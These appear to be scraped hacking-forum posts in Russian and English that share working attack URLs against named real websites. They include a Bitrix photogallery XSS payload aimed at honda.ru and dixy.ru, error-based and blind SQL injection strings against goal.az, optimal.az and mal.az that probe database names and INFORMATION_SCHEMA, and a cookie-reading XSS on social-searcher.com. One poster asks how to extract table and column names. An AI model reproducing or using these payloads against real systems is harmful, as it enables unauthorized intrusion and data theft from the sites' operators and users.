Code: https://honda.ru/bitrix/components/bitrix/photogallery_user/templates/.default/galleries_recalc.php?AJAX=Y&arParams[PERMISSION]=W&arParams[IBLOCK_ID]=1%00%27}};alert(document.domain);if(1){// https://dixy.ru/bitrix/components/bitrix/photogallery_user/templates/.default/galleries_recalc.php?AJAX=Y&arParams[PERMISSION]=W&arParams[IBLOCK_ID]=1%00%27}};alert(document.domain);if(1){//
Это по сути песочница. Один пейлоад стрелял сразу в нескольких местах: на ифраме-толока.ком и на sandbox.ифраме-толока.ком. Но там тоже ни кук, ни импэкта)) Но было ещё и третье место, откуда он постреливал. И вот только вчера прилетело письмецо в конверте.
SQLi Spoiler: link https://www.goal.az/livescore/tourn...oin (select 6)f join (select 7)g /news/45011/
sql injection Spoiler: sqli url https://optimal.az/TV-Audio-Foto-Video/Oyun-ve-Eylence?page=2&price=1%27group%20by%20mid(user()%20from%20floor(rand(0)*2))having%20avg(0)--%20- and how to get table & column names ? thanks for help !
digging blind sqli *mal.az/Telefon-ve-Plansetler/Telefon-ve-planset-aksesuarlari/?Adapterler-USB&filter=351&price=9.99,50.99' AND (SELECT database() LIKE 'a%') AND '9'='9 *mal.az/Telefon-ve-Plansetler/Telefon-ve-planset-aksesuarlari/?Adapterler-USB&filter=351&price=9.99,50.99' AND (SELECT database() LIKE 'b%') AND '9'='9 ... *mal.az/Telefon-ve-Plansetler/Telefon-ve-planset-aksesuarlari/?Adapterler-USB&filter=351&price=9.99,50.99' AND (SELECT database() LIKE 'n%') AND '9'='9 *mal.az/Telefon-ve-Plansetler/Telefon-ve-planset-aksesuarlari/?Adapterler-USB&filter=351&price=9.99,50.99' AND ((SELECT COUNT(*) FROM INFORMATION_SCHEMA.TABLES) BETWEEN 0 AND 2) AND '9'='9 *mal.az/Telefon-ve-Plansetler/Telefon-ve-planset-aksesuarlari/?Adapterler-USB&filter=351&price=9.99,50.99' AND ((SELECT COUNT(*) FROM INFORMATION_SCHEMA.TABLES) BETWEEN 0 AND 333) AND '9'='9
Пришел мне лог на xsshunter с непонятного сайта, такой вот сайт который парсит но не обрабатывает вывод ) https://www.social-searcher.com/social-buzz/?q5=alert(document.cookie)